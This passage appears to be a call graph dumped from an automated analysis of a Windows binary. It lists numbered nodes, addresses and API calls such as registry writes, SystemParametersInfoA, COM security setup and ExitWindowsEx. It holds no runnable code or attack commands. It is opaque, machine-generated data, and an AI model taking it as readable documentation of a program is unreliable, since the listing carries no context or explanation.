93845->93847 93848 11061290 268 API calls 93846->93848 93847->93846 93849 111425cd 93848->93849 93850 11061290 268 API calls 93849->93850 93879 111425e7 93850->93879 93851 11142915 93852 110d1930 268 API calls 93851->93852 93854 11142cf9 93851->93854 93855 11142933 93852->93855 93853 11061320 274 API calls 93853->93879 93861 11061170 69 API calls 93854->93861 93858 1105e820 79 API calls 93855->93858 93856 11142905 93857 11147060 std::locale::facet::_Facet_Register 21 API calls 93856->93857 93857->93851 93860 11142970 93858->93860 93859 11147060 21 API calls std::locale::facet::_Facet_Register 93859->93879 93862 11142abd 93860->93862 93864 11061290 268 API calls 93860->93864 93863 11142d52 93861->93863 93866 11061a70 274 API calls 93862->93866 93865 11061170 69 API calls 93863->93865 93869 1114298e 93864->93869 93865->93870 93867 11142ad9 93866->93867 93943 110684e0 298 API calls std::locale::facet::_Facet_Register 93867->93943 93868 11132900 86 API calls 93868->93879 93871 11061320 274 API calls 93869->93871 93870->93820 93880 1114299d 93871->93880 93873 111429d2 93874 11061290 268 API calls 93873->93874 93877 111429e8 93874->93877 93875 11142b03 93878 11142b33 EnterCriticalSection 93875->93878 93904 11142b07 93875->93904 93876 11147060 std::locale::facet::_Facet_Register 21 API calls 93876->93880 93882 11061320 274 API calls 93877->93882 93883 11060f50 271 API calls 93878->93883 93879->93851 93879->93853 93879->93856 93879->93859 93879->93868 93885 11081f20 86 API calls std::locale::facet::_Facet_Register 93879->93885 93888 11081e70 86 API calls 93879->93888 93880->93873 93880->93876 93881 11061320 274 API calls 93880->93881 93881->93880 93890 111429f8 93882->93890 93884 11142b50 93883->93884 93887 11061a70 274 API calls 93884->93887 93885->93879 93893 11142b66 93887->93893 93888->93879 93889 11142a31 93891 11061290 268 API calls 93889->93891 93890->93889 93894 11147060 std::locale::facet::_Facet_Register 21 API calls 93890->93894 93903 11061320 274 API calls 93890->93903 93895 11142a47 93891->93895 93892 11142b7a LeaveCriticalSection 93898 11142bce 93892->93898 93899 11142b8e 93892->93899 93893->93892 93897 1102b140 283 API calls 93893->93897 93894->93890 93896 11061320 274 API calls 93895->93896 93914 11142a56 93896->93914 93901 11142b77 93897->93901 93902 11134310 273 API calls 93898->93902 93899->93898 93907 11147060 std::locale::facet::_Facet_Register 21 API calls 93899->93907 93901->93892 93906 11142bd8 93902->93906 93903->93890 93904->93878 93944 11051360 354 API calls 4 library calls 93904->93944 93945 110684e0 298 API calls std::locale::facet::_Facet_Register 93904->93945 93905 11142a91 93909 11061170 69 API calls 93905->93909 93908 110d1930 268 API calls 93906->93908 93910 11142b9c 93907->93910 93912 11142be6 93908->93912 93913 11142a9f 93909->93913 93918 11142010 387 API calls 93910->93918 93911 11147060 std::locale::facet::_Facet_Register 21 API calls 93911->93914 93946 110d0170 265 API calls std::locale::facet::_Facet_Register 93912->93946 93915 11061170 69 API calls 93913->93915 93914->93905 93914->93911 93916 11061320 274 API calls 93914->93916 93917 11142aae 93915->93917 93916->93914 93920 11061170 69 API calls 93917->93920 93921 11142ba7 93918->93921 93920->93862 93921->93898 93923 11147060 std::locale::facet::_Facet_Register 21 API calls 93921->93923 93922 11142c1c 93937 11142c9f 93922->93937 93947 110d1530 265 API calls 93922->93947 93924 11142bc0 93923->93924 93927 11027200 836 API calls 93924->93927 93925 110d0a10 265 API calls 93928 11142cdb 93925->93928 93927->93898 93932 110d0a10 265 API calls 93928->93932 93932->93854 93937->93925 93943->93875 93944->93904 93945->93904 93946->93922 93949 1112d87c 93948->93949 93950 1112d8b7 93949->93950 93951 1112d8a4 93949->93951 93972 1106c340 298 API calls 93950->93972 93953 11147af0 269 API calls 93951->93953 93954 1112d8af 93953->93954 93955 1112d903 93954->93955 93956 11142e60 std::locale::facet::_Facet_Register 265 API calls 93954->93956 93955->93738 93955->93739 93956->93955 93957->93717 93958->93725 93959->93730 93960->93736 93961->93743 93962->93742 93963->93759 93964->93762 93965->93772 93966->93757 93967->93779 93968->93752 93969->93764 93970->93755 93971->93774 93972->93954 93973 11135c20 93974 11135c29 93973->93974 93980 11135c58 93973->93980 93975 11145ef0 std::locale::facet::_Facet_Register 90 API calls 93974->93975 93976 11135c2e 93975->93976 93977 11133b00 274 API calls 93976->93977 93976->93980 93978 11135c37 93977->93978 93979 1105e820 79 API calls 93978->93979 93978->93980 93979->93980 93981 11137300 93982 1113736d 93981->93982 93983 1113730c 93981->93983 93984 1105e820 79 API calls 93983->93984 93986 11137325 93984->93986 93985 1113734d 93985->93982 94001 1112f930 144 API calls std::locale::facet::_Facet_Register 93985->94001 93986->93982 93986->93985 93989 1112fc70 93986->93989 93990 1112fc7d 93989->93990 93995 1112fd09 93989->93995 93991 1112fcb8 93990->93991 94002 111165c0 93990->94002 93994 1112fcd2 93991->93994 94066 1111c990 93991->94066 93994->93995 93997 1105e820 79 API calls 93994->93997 93995->93985 93996 1112fca9 94048 11116880 93996->94048 93999 1112fcf4 93997->93999 93999->93995 94181 11116d50 93999->94181 94001->93982 94003 111165e4 94002->94003 94004 1111685a 94002->94004 94006 1111677d SystemParametersInfoA 94003->94006 94007 111165ec 94003->94007 94005 11145ef0 std::locale::facet::_Facet_Register 90 API calls 94004->94005 94008 11116868 94005->94008 94010 111167a8 94006->94010 94009 111166e0 94007->94009 94017 11145ef0 std::locale::facet::_Facet_Register 90 API calls 94007->94017 94011 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 94008->94011 94012 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 94009->94012 94013 11116833 SystemParametersInfoA 94010->94013 94014 111167bc 94010->94014 94015 11116876 94011->94015 94016 111166ef 94012->94016 94019 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 94013->94019 94018 11143bd0 std::locale::facet::_Facet_Register RegQueryValueExA 94014->94018 94015->93996 94016->93996 94021 11116615 94017->94021 94026 111167e4 94018->94026 94020 11116854 94019->94020 94020->93996 94022 111166f5 SystemParametersInfoA 94021->94022 94028 11116627 94021->94028 94024 1111676e SystemParametersInfoA 94022->94024 94025 1111670e 94022->94025 94023 11116814 RegCloseKey 94027 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 94023->94027 94024->94009 94029 11143bd0 std::locale::facet::_Facet_Register RegQueryValueExA 94025->94029 94026->94023 94193 111648ed 79 API calls __isdigit_l 94026->94193 94031 1111682d 94027->94031 94028->94009 94032 11143bd0 std::locale::facet::_Facet_Register RegQueryValueExA 94028->94032 94033 1111673a 94029->94033 94031->93996 94035 11116650 94032->94035 94036 111166d9 RegCloseKey 94033->94036 94192 111648ed 79 API calls __isdigit_l 94033->94192 94034 111167fe 94034->94023 94037 11116805 SystemParametersInfoA 94034->94037 94038 11116678 94035->94038 94039 11116666 SystemParametersInfoA 94035->94039 94036->94009 94037->94023 94040 11143bd0 std::locale::facet::_Facet_Register RegQueryValueExA 94038->94040 94039->94038 94042 111166a4 94040->94042 94042->94036 94191 111648ed 79 API calls __isdigit_l 94042->94191 94043 11116754 94043->94036 94044 1111675f SystemParametersInfoA 94043->94044 94044->94036 94046 111166be 94046->94036 94047 111166c5 SystemParametersInfoA 94046->94047 94047->94036 94049 11145ef0 std::locale::facet::_Facet_Register 90 API calls 94048->94049 94050 1111689e 94049->94050 94051 111168c5 94050->94051 94053 111168a8 94050->94053 94056 11145c70 std::locale::facet::_Facet_Register 90 API calls 94050->94056 94052 111168d4 CoInitialize CoCreateInstance 94051->94052 94051->94053 94054 11116904 LoadLibraryA 94052->94054 94065 111168f9 94052->94065 94055 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 94053->94055 94057 11116920 GetProcAddress 94054->94057 94054->94065 94058 111168b6 94055->94058 94056->94051 94059 11116930 SHGetSettings 94057->94059 94060 11116944 FreeLibrary 94057->94060 94058->93991 94059->94060 94060->94065 94061 111169e1 CoUninitialize 94062 111169e7 94061->94062 94063 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 94062->94063 94064 111169f6 94063->94064 94064->93991 94065->94061 94065->94062 94067 1111c9b0 94066->94067 94068 1111c9c3 94066->94068 94071 1105e820 79 API calls 94067->94071 94069 1111ca03 SystemParametersInfoA 94068->94069 94070 1111c9cf 94068->94070 94072 1111ca0c 94068->94072 94069->94072 94070->94072 94073 11145ef0 std::locale::facet::_Facet_Register 90 API calls 94070->94073 94071->94068 94074 1111ca38 94072->94074 94078 1105e820 79 API calls 94072->94078 94077 1111c9dc 94073->94077 94075 1111ca44 94074->94075 94076 1111ca6b SystemParametersInfoA 94074->94076 94079 1111ca7d 94074->94079 94075->94079 94082 1111ca56 SystemParametersInfoA 94075->94082 94076->94079 94080 1111c9e0 GetSystemMetrics 94077->94080 94081 1111c9ec 94077->94081 94078->94074 94083 1111ca9c 94079->94083 94085 1105e820 79 API calls 94079->94085 94080->94072 94080->94081 94081->94072 94084 1111c9f1 SystemParametersInfoA 94081->94084 94082->94079 94086 1111caa8 94083->94086 94087 1111cacc SystemParametersInfoA 94083->94087 94088 1111cadb 94083->94088 94084->94072 94085->94083 94086->94088 94089 1111cab7 SystemParametersInfoA 94086->94089 94087->94088 94090 1111cafa 94088->94090 94091 1105e820 79 API calls 94088->94091 94089->94088 94092 1111cb06 94090->94092 94093 1111cb2a SystemParametersInfoA 94090->94093 94094 1111cb39 94090->94094 94091->94090 94092->94094 94095 1111cb15 SystemParametersInfoA 94092->94095 94093->94094 94096 1111cb58 94094->94096 94099 1105e820 79 API calls 94094->94099 94095->94094 94097 1111cb64 94096->94097 94098 1111cb88 SystemParametersInfoA 94096->94098 94100 1111cb97 94096->94100 94097->94100 94101 1111cb73 SystemParametersInfoA 94097->94101 94098->94100 94099->94096 94102 1111cbb6 94100->94102 94103 1105e820 79 API calls 94100->94103 94101->94100 94104 1111cbc2 94102->94104 94105 1111cbe6 SystemParametersInfoA 94102->94105 94106 1111cbf5 94102->94106 94103->94102 94104->94106 94107 1111cbd1 SystemParametersInfoA 94104->94107 94105->94106 94108 1111cc14 94106->94108 94109 1105e820 79 API calls 94106->94109 94107->94106 94110 1111cc20 94108->94110 94111 1111cc44 SystemParametersInfoA 94108->94111 94112 1111cc53 94108->94112 94109->94108 94110->94112 94113 1111cc2f SystemParametersInfoA 94110->94113 94111->94112 94114 1111cc72 94112->94114 94115 1105e820 79 API calls 94112->94115 94113->94112 94116 1111cca2 SystemParametersInfoA 94114->94116 94117 1111cc7e 94114->94117 94118 1111ccb1 94114->94118 94115->94114 94116->94118 94117->94118 94119 1111cc8d SystemParametersInfoA 94117->94119 94120 1111ccd0 94118->94120 94121 1105e820 79 API calls 94118->94121 94119->94118 94122 1111cd00 SystemParametersInfoA 94120->94122 94123 1111ccdc 94120->94123 94124 1111cd0f 94120->94124 94121->94120 94122->94124 94123->94124 94125 1111cceb SystemParametersInfoA 94123->94125 94126 1111cd2e 94124->94126 94127 1105e820 79 API calls 94124->94127 94125->94124 94128 1111cd65 94126->94128 94129 1111cd3a 94126->94129 94131 1111cd5c 94126->94131 94127->94126 94194 11116e30 94128->94194 94129->94131 94133 11116e30 4 API calls 94129->94133 94132 1111cd9a 94131->94132 94134 1105e820 79 API calls 94131->94134 94135 1111cda6 94132->94135 94136 1111cdca SystemParametersInfoA 94132->94136 94137 1111cdd9 94132->94137 94133->94131 94134->94132 94135->94137 94138 1111cdb5 SystemParametersInfoA 94135->94138 94136->94137 94139 1111cdf8 94137->94139 94142 1105e820 79 API calls 94137->94142 94138->94137 94140 1111ce25 SystemParametersInfoA 94139->94140 94141 1111ce04 94139->94141 94144 1111ce31 94139->94144 94140->94144 94143 1111ce13 SystemParametersInfoA 94141->94143 94141->94144 94142->94139 94143->94144 94145 1105e820 79 API calls 94144->94145 94149 1111ce50 94144->94149 94145->94149 94146 1111ce83 94205 11116ee0 94146->94205 94147 1111ce5c 94150 1111ce7a 94147->94150 94151 11116ee0 4 API calls 94147->94151 94149->94146 94149->94147 94149->94150 94152 1111ceba 94150->94152 94153 1105e820 79 API calls 94150->94153 94151->94150 94154 1111cec6 94152->94154 94155 1111ceed 94152->94155 94157 1111cee4 94152->94157 94153->94152 94154->94157 94158 11116f00 4 API calls 94154->94158 94208 11116f00 94155->94208 94159 1111cf1e 94157->94159 94160 1105e820 79 API calls 94157->94160 94158->94157 94161 1111cf51 94159->94161 94162 1111cf2a 94159->94162 94164 1111cf48 94159->94164 94160->94159 94163 11116f00 4 API calls 94161->94163 94162->94164 94166 11116f00 4 API calls 94162->94166 94163->94164 94165 1111cf82 94164->94165 94167 1105e820 79 API calls 94164->94167 94168 1111cfb5 94165->94168 94169 1111cf8e 94165->94169 94171 1111cfac 94165->94171 94166->94164 94167->94165 94170 11116f00 4 API calls 94168->94170 94169->94171 94173 11116f00 4 API calls 94169->94173 94170->94171 94172 1111cfe6 94171->94172 94174 1105e820 79 API calls 94171->94174 94175 1111cff2 94172->94175 94176 1111d01e 94172->94176 94178 1111d030 94172->94178 94173->94171 94174->94172 94175->94178 94179 11116f00 4 API calls 94175->94179 94177 11116f00 4 API calls 94176->94177 94177->94178 94178->93994 94180 1111d010 94179->94180 94180->93994 94182 11145ef0 std::locale::facet::_Facet_Register 90 API calls 94181->94182 94183 11116d5b 94182->94183 94184 11116de3 94183->94184 94185 11116d63 RegOpenKeyExA 94183->94185 94184->93995 94185->94184 94186 11116d8c 94185->94186 94187 11116dc3 RegSetValueExA RegCloseKey 94186->94187 94188 11116d93 94186->94188 94187->94184 94189 11143bd0 std::locale::facet::_Facet_Register RegQueryValueExA 94188->94189 94190 11116db0 RegCloseKey 94189->94190 94190->93995 94191->94046 94192->94043 94193->94034 94196 11116e54 94194->94196 94195 11116ecb 94195->94131 94196->94195 94197 11116e68 94196->94197 94198 11116e8d 94196->94198 94199 11143bd0 std::locale::facet::_Facet_Register RegQueryValueExA 94197->94199 94200 11116eb2 RegSetValueExA 94198->94200 94202 11143bd0 std::locale::facet::_Facet_Register RegQueryValueExA 94198->94202 94201 11116e7d RegCloseKey 94199->94201 94203 11116ec4 RegCloseKey 94200->94203 94201->94131 94204 11116eab 94202->94204 94203->94195 94204->94200 94204->94203 94206 11116e30 4 API calls 94205->94206 94207 11116efb 94206->94207 94207->94150 94209 11116e30 4 API calls 94208->94209 94210 11116f1b 94209->94210 94210->94157 94211 1115cca0 94212 1115ccb4 94211->94212 94213 1115ccac 94211->94213 94223 1116406b 94212->94223 94216 1115ccd4 94218 1115ce00 94219 11163aa5 _free 66 API calls 94218->94219 94220 1115ce28 94219->94220 94221 1115ccf1 94221->94218 94222 1115cde4 SetLastError 94221->94222 94222->94221 94224 11170fc4 __calloc_crt 66 API calls 94223->94224 94225 11164085 94224->94225 94229 1115ccc8 94225->94229 94247 1116a1af 66 API calls __getptd_noexit 94225->94247 94227 11164098 94227->94229 94248 1116a1af 66 API calls __getptd_noexit 94227->94248 94229->94216 94229->94218 94230 1115c8e0 CoInitializeSecurity CoCreateInstance 94229->94230 94231 1115c955 wsprintfW SysAllocString 94230->94231 94232 1115cad4 94230->94232 94237 1115c99b 94231->94237 94233 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 94232->94233 94235 1115cb00 94233->94235 94234 1115cac1 SysFreeString 94234->94232 94235->94221 94236 1115caa9 94236->94234 94237->94234 94237->94236 94237->94237 94238 1115ca2c 94237->94238 94239 1115ca1a wsprintfW 94237->94239 94249 110978f0 94238->94249 94239->94238 94241 1115ca3e 94242 110978f0 266 API calls 94241->94242 94243 1115ca53 94242->94243 94254 110979a0 InterlockedDecrement SysFreeString std::ios_base::_Ios_base_dtor 94243->94254 94245 1115ca97 94255 110979a0 InterlockedDecrement SysFreeString std::ios_base::_Ios_base_dtor 94245->94255 94247->94227 94248->94229 94250 111101b0 std::locale::facet::_Facet_Register 265 API calls 94249->94250 94251 11097923 94250->94251 94252 11097936 SysAllocString 94251->94252 94253 11097954 94251->94253 94252->94253 94253->94241 94254->94245 94255->94236 94256 1102d9f4 94258 1102da01 94256->94258 94257 1102da22 94344 11029490 458 API calls std::locale::facet::_Facet_Register 94257->94344 94258->94257 94343 1109f5f0 273 API calls std::locale::facet::_Facet_Register 94258->94343 94261 1102da33 94326 11028690 SetEvent 94261->94326 94263 1102da38 94264 1102da42 94263->94264 94265 1102da4d 94263->94265 94345 110eccf0 886 API calls 94264->94345 94267 1102da6a 94265->94267 94268 1102da6f 94265->94268 94346 11059fb0 SetEvent 94267->94346 94270 1102da77 94268->94270 94271 1102daae 94268->94271 94270->94271 94277 1102daa3 Sleep 94270->94277 94272 11147060 std::locale::facet::_Facet_Register 21 API calls 94271->94272 94273 1102dab8 94272->94273 94274 1102dac5 94273->94274 94275 1102daf6 94273->94275 94274->94273 94278 1105e820 79 API calls 94274->94278 94276 1102daf3 94275->94276 94327 110b0470 94275->94327 94276->94275 94277->94271 94279 1102dae8 94278->94279 94279->94275 94347 1102d750 294 API calls std::locale::facet::_Facet_Register 94279->94347 94286 1102db3a 94287 1102db4d 94286->94287 94349 111361c0 299 API calls 5 library calls 94286->94349 94350 1100d620 94287->94350 94290 1102de59 94291 1102de70 94290->94291 94355 1100d330 94290->94355 94295 1102de97 GetModuleFileNameA GetFileAttributesA 94291->94295 94302 1102dfb3 94291->94302 94293 1102de65 94294 11147060 std::locale::facet::_Facet_Register 21 API calls 94293->94294 94294->94291 94296 1102debf 94295->94296 94295->94302 94298 111101b0 std::locale::facet::_Facet_Register 265 API calls 94296->94298 94297 11147060 std::locale::facet::_Facet_Register 21 API calls 94299 1102e062 94297->94299 94300 1102dec6 94298->94300 94361 11147020 FreeLibrary 94299->94361 94304 11143630 267 API calls 94300->94304 94302->94297 94303 1102e06a 94305 1102e0a6 94303->94305 94306 1102e094 ExitWindowsEx 94303->94306 94307 1102e084 ExitWindowsEx Sleep 94303->94307 94313 1102dee8 94304->94313 94308 1102e0b6 94305->94308 94309 1102e0ab Sleep 94305->94309 94306->94305 94307->94306 94310 11147060 std::locale::facet::_Facet_Register 21 API calls 94308->94310 94309->94308 94312 1102e0c0 ExitProcess 94310->94312 94314 11143780 86 API calls 94313->94314 94315 1102df0d 94314->94315 94315->94302 94316 11081e00 std::locale::facet::_Facet_Register IsDBCSLeadByte 94315->94316 94317 1102df23 94316->94317 94318 1102df3e _memset 94317->94318 94359 11029a70 265 API calls 2 library calls 94317->94359 94320 1102df58 FindFirstFileA 94318->94320 94321 1102df78 FindNextFileA 94320->94321 94323 1102df98 FindClose 94321->94323 94324 1102dfa4 94323->94324 94360 111273e0 291 API calls 5 library calls 94324->94360 94326->94263 94362 110808b0 94327->94362 94332 1102db1a 94336 110eb4a0 94332->94336 94333 110b04b7 94374 11029a70 265 API calls 2 library calls 94333->94374 94337 110b0470 267 API calls 94336->94337 94338 110eb4cd 94337->94338 94390 110ea880 94338->94390 94342 1102db25 94348 110b0660 267 API calls std::locale::facet::_Facet_Register 94342->94348 94343->94257 94344->94261 94345->94265 94346->94268 94347->94276 94348->94286 94349->94287 94351 1100d632 94350->94351 94352 1100d62b 94350->94352 94353 1100d63b FreeLibrary 94351->94353 94354 1100d67e 94351->94354 94352->94290 94353->94354 94354->94290 94356 1100d396 wsprintfA 94355->94356 94357 1100d33b 94355->94357 94356->94293 94357->94356 94358 1100d342 94357->94358 94358->94293 94360->94302 94361->94303 94363 110808d4 94362->94363 94364 110808d8 94363->94364 94365 110808ef 94363->94365 94375 11029a70 265 API calls 2 library calls 94364->94375 94367 11080908 94365->94367 94368 110808ec 94365->94368 94371 110b0460 94367->94371 94368->94365 94376 11029a70 265 API calls 2 library calls 94368->94376 94377 11081590 94371->94377 94378 110815dd 94377->94378 94379 110815b1 94377->94379 94382 1108162a wsprintfA 94378->94382 94383 11081605 wsprintfA 94378->94383 94379->94378 94380 110815cb 94379->94380 94381 11162bb7 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 94380->94381 94384 110815d9 94381->94384 94389 11029a70 265 API calls 2 library calls 94382->94389 94383->94378 94384->94332 94384->94333 94391 110ea88b 94390->94391 94392 110ea925 94391->94392 94393 110ea8ae 94391->94393 94396 110ea8c5 94391->94396 94400 110b0660 267 API calls std::locale::facet::_Facet_Register 94392->94400 94401 11029a70 265 API calls 2 library calls 94393->94401 94395 110ea8c2 94395->94396 94402 11029a70 265 API calls 2 library calls 94395->94402 94396->94395 94397 110ea8f2 SendMessageTimeoutA 94396->94397 94397->94392 94400->94342 94403 110310d5 GetNativeSystemInfo 94404 110310e1 94403->94404 94407 11031081 94404->94407 94408 11031145 94404->94408 94417 11031088 94404->94417 94405 110312db GetStockObject GetObjectA 94406 1103130a SetErrorMode SetErrorMode 94405->94406 94411 111101b0 std::locale::facet::_Facet_Register 265 API calls 94406->94411 94412 111101b0 std::locale::facet::_Facet_Register 265 API calls 94407->94412 94410 111101b0 std::locale::facet::_Facet_Register 265 API calls 94408->94410 94413 1103114c 94410->94413 94414 11031346 94411->94414 94412->94417 94530 110fae60 272 API calls std::locale::facet::_Facet_Register 94413->94530 94471 11028980 94414->94471 94417->94405 94418 11031360 94419 111101b0 std::locale::facet::_Facet_Register 265 API calls 94418->94419 94420 11031386 94419->94420 94421 11028980 268 API calls 94420->94421 94422 1103139f InterlockedExchange 94421->94422 94424 111101b0 std::locale::facet::_Facet_Register 265 API calls 94422->94424 94425 110313c7 94424->94425 94474 1108a880 94425->94474 94427 110313df GetACP 94485 11163f93 94427->94485 94431 111663a3 _setlocale 101 API calls 94432 11031410 94431->94432 94433 11143780 86 API calls 94432->94433 94434 1103143c 94433->94434 94435 111101b0 std::locale::facet::_Facet_Register 265 API calls 94434->94435 94436 1103145c 94435->94436 94437 11061aa0 301 API calls 94436->94437 94439 11031487 94437->94439 94438 110314d4 94440 110ccc90 4 API calls 94438->94440 94439->94438 94441 111101b0 std::locale::facet::_Facet_Register 265 API calls 94439->94441 94442 110314fa 94440->94442 94443 110314ae 94441->94443 94444 111101b0 std::locale::facet::_Facet_Register 265 API calls 94442->94444 94446 11061710 293 API calls 94443->94446 94445 11031501 94444->94445 94496 11125d40 94445->94496 94446->94438 94472 11088b30 268 API calls 94471->94472 94473 1102898b _memset 94472->94473 94473->94418 94475 111101b0 std::locale::facet::_Facet_Register 265 API calls 94474->94475 94476 1108a8b7 94475->94476 94477 1108a8d9 InitializeCriticalSection 94476->94477 94478 111101b0 std::locale::facet::_Facet_Register 265 API calls 94476->94478 94481 1108a93a 94477->94481 94480 1108a8d2 94478->94480 94480->94477 94531 1116305a 66 API calls std::exception::_Copy_str 94480->94531 94481->94427 94483 1108a909 94532 111634b1 RaiseException 94483->94532 94486 11163fc6 94485->94486 94487 11163fb1 94485->94487 94486->94487 94488 11163fcd 94486->94488 94555 1116a1af 66 API calls __getptd_noexit 94487->94555 94533 1117027b 102 API calls 11 library calls 94488->94533 94491 11163fb6 94556 1116edc4 11 API calls __mbsupr_s_l 94491->94556 94493 11163ff3 94494 11031406 94493->94494 94534 111700e4 94493->94534 94494->94431 94497 111101b0 std::locale::facet::_Facet_Register 265 API calls 94496->94497 94498 11125d74 94497->94498 94499 11125da5 94498->94499 94500 11125d8a 94498->94500 94563 11124f70 94499->94563 94609 110765c0 468 API calls std::locale::facet::_Facet_Register 94500->94609 94503 11125d9a 94503->94499 94530->94417 94531->94483 94532->94477 94533->94493 94535 1116a147 __input_l 66 API calls 94534->94535 94536 111700f4 94535->94536 94537 11170116 94536->94537 94538 111700ff 94536->94538 94540 1117011a 94537->94540 94548 11170127 __stbuf 94537->94548 94557 1116a1af 66 API calls __getptd_noexit 94538->94557 94558 1116a1af 66 API calls __getptd_noexit 94540->94558 94542 11170188 94543 11170217 94542->94543 94544 11170197 94542->94544 94562 111730a4 97 API calls 5 library calls 94543->94562 94546 111701ae 94544->94546 94551 111701cb 94544->94551 94560 111730a4 97 API calls 5 library calls 94546->94560 94548->94542 94549 11170104 94548->94549 94552 1117017d 94548->94552 94559 111799f8 66 API calls __mbsupr_s_l 94548->94559 94549->94494 94551->94549 94561 1117650e 71 API calls 6 library calls 94551->94561 94552->94542 94554 11177ff0 __getbuf 66 API calls 94552->94554 94554->94542 94555->94491 94556->94494 94557->94549 94558->94549 94559->94552 94560->94549 94561->94549 94562->94549 94564 11124fd1 InitializeCriticalSection 94563->94564 94566 11124ffe GetCurrentThreadId 94564->94566 94568 11125035 94566->94568 94569 1112503c 94566->94569 94643 1110fff0 InterlockedIncrement 94568->94643 94611 11160b10 InterlockedIncrement 94569->94611 94572 11125051 94573 1105e820 79 API calls 94572->94573 94574 11125089 94573->94574 94575 111250e2 94574->94575 94576 111101b0 std::locale::facet::_Facet_Register 265 API calls 94574->94576 94577 111101b0 std::locale::facet::_Facet_Register 265 API calls 94575->94577 94578 111250c3 94576->94578 94579 1112510a 94577->94579 94578->94575 94580 11110de0 429 API calls 94578->94580 94582 11125134 94579->94582 94644 1100d2c0 445 API calls 94579->94644 94580->94575 94584 111101b0 std::locale::facet::_Facet_Register 265 API calls 94582->94584 94593 111251ac 94582->94593 94583 111101b0 std::locale::facet::_Facet_Register 265 API calls 94585 111251c9 94583->94585 94586 1112515f 94584->94586 94587 11125215 GlobalAddAtomA GetVersionExA 94585->94587 94645 110719d0 269 API calls 94585->94645 94588 1110f2d0 266 API calls 94586->94588 94586->94593 94589 11125252 94587->94589 94590 1112525d 94587->94590 94588->94593 94646 11116460 12 API calls 2 library calls 94589->94646 94591 1105e820 79 API calls 94590->94591 94594 11125271 94591->94594 94593->94583 94597 1105e820 79 API calls 94594->94597 94596 11125257 94596->94590 94598 1112528b 94597->94598 94599 1105e820 79 API calls 94598->94599 94600 111252a5 94599->94600 94601 1105e820 79 API calls 94600->94601 94602 111252c3 94601->94602 94603 1105e820 79 API calls 94602->94603 94604 111252e9 94603->94604 94605 1105e820 79 API calls 94604->94605 94609->94503 94612 11160b27 CreateCompatibleDC 94611->94612 94613 11160b22 94611->94613 94615 11160b4c SelectPalette SelectPalette 94612->94615 94616 11160b38 94612->94616 94647 11160a60 272 API calls std::locale::facet::_Facet_Register 94613->94647 94649 11160750 265 API calls 94615->94649 94648 11029a70 265 API calls 2 library calls 94616->94648 94620 11160b73 94650 11160750 265 API calls 94620->94650 94622 11160b80 94623 11160b93 94622->94623 94624 11160c4e 94622->94624 94651 111606e0 265 API calls 2 library calls 94623->94651 94655 11160750 265 API calls 94624->94655 94627 11160b9e 94629 11160bc3 94627->94629 94630 11160bad GetSystemPaletteEntries 94627->94630 94628 11160c5b 94631 11160c61 DeleteDC 94628->94631 94632 11160be6 94629->94632 94633 11160bcf 94629->94633 94630->94632 94631->94572 94653 111606e0 265 API calls 2 library calls 94632->94653 94652 11029a70 265 API calls 2 library calls 94633->94652 94637 11160bf2 _memmove 94638 1116406b _calloc 66 API calls 94637->94638 94639 11160c21 94638->94639 94639->94631 94640 11160c2b 94639->94640 94654 11029a70 265 API calls 2 library calls 94640->94654 94643->94569 94644->94582 94645->94587 94646->94596 94647->94612 94649->94620 94650->94622 94651->94627 94653->94637 94655->94628 94694 69d05ae6 94695 69d05af1 ___security_init_cookie 94694->94695 94696 69d05af6 94694->94696 94695->94696 94699 69d059f0 94696->94699 94698 69d05b04 94700 69d059fc 94699->94700 94703 69d05a49 94700->94703 94705 69d05a99 94700->94705 94707 69d0588c 94700->94707 94702 69d05a79 94704 69d0588c __CRT_INIT@12 130 API calls 94702->94704 94702->94705 94703->94702 94703->94705 94706 69d0588c __CRT_INIT@12 130 API calls 94703->94706 94704->94705 94705->94698 94706->94702 94708 69d05898 94707->94708 94709 69d058a0 94708->94709 94710 69d0591a 94708->94710 94760 69d0607f HeapCreate 94709->94760 94712 69d05920 94710->94712 94713 69d0597b 94710->94713 94718 69d0593e 94712->94718 94734 69d058a9 94712->94734 94825 69d05e35 11 API calls _doexit 94712->94825 94714 69d05980 94713->94714 94715 69d059d9 94713->94715 94798 69d06da9 TlsGetValue 94714->94798 94715->94734 94807 69d070ad 94715->94807 94716 69d058a5 94716->94734 94761 69d07127 GetModuleHandleW 94716->94761 94719 69d05952 94718->94719 94826 69d09b09 25 API calls _free 94718->94826 94829 69d05965 28 API calls __mtterm 94719->94829 94727 69d058b5 __RTC_Initialize 94728 69d058b9 94727->94728 94736 69d058c5 GetCommandLineA 94727->94736 94818 69d0609d HeapDestroy 94728->94818 94729 69d05948 94827 69d06dfa 28 API calls _free 94729->94827 94733 69d0599d DecodePointer 94737 69d059b2 94733->94737 94734->94703 94735 69d0594d 94828 69d0609d HeapDestroy 94735->94828 94785 69d0f016 GetEnvironmentStringsW 94736->94785 94740 69d059b6 94737->94740 94741 69d059cd 94737->94741 94830 69d06e37 13 API calls 2 library calls 94740->94830 94744 69d01bfd _free 24 API calls 94741->94744 94744->94734 94746 69d059bd GetCurrentThreadId 94746->94734 94747 69d058df 94748 69d058e3 94747->94748 94749 69d058ea 94747->94749 94820 69d06dfa 28 API calls _free 94748->94820 94821 69d0ef5b 82 API calls 3 library calls 94749->94821 94752 69d058ef 94753 69d05903 94752->94753 94822 69d0ecd4 74 API calls 5 library calls 94752->94822 94759 69d05908 94753->94759 94824 69d09b09 25 API calls _free 94753->94824 94756 